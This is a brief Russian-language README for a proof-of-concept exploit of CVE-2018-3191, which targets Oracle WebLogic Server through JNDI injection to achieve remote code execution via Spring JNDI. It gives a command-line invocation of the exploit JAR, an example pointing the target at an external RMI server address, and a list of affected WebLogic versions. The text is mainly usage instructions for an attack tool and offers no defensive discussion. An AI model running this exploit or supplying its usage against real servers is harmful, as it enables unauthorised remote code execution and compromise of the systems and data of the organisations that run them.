
Эксплойт Proof-of-concept для CVE-2018-3191, нацеленный на WebLogic Server через JNDI-инъекцию. Доставляет JAR-нагрузку для запуска удаленного выполнения кода через Spring JNDI.
Использование:
java -jar weblogic-spring-jndi.jar <jndi_address>
Пример:
java -jar weblogic-spring-jndi.jar rmi://<IP>:1099/Object
Примечание:
12.2.1.3
10.3.6.0
12.2.1.0
12.1.3.0
12.2.1.1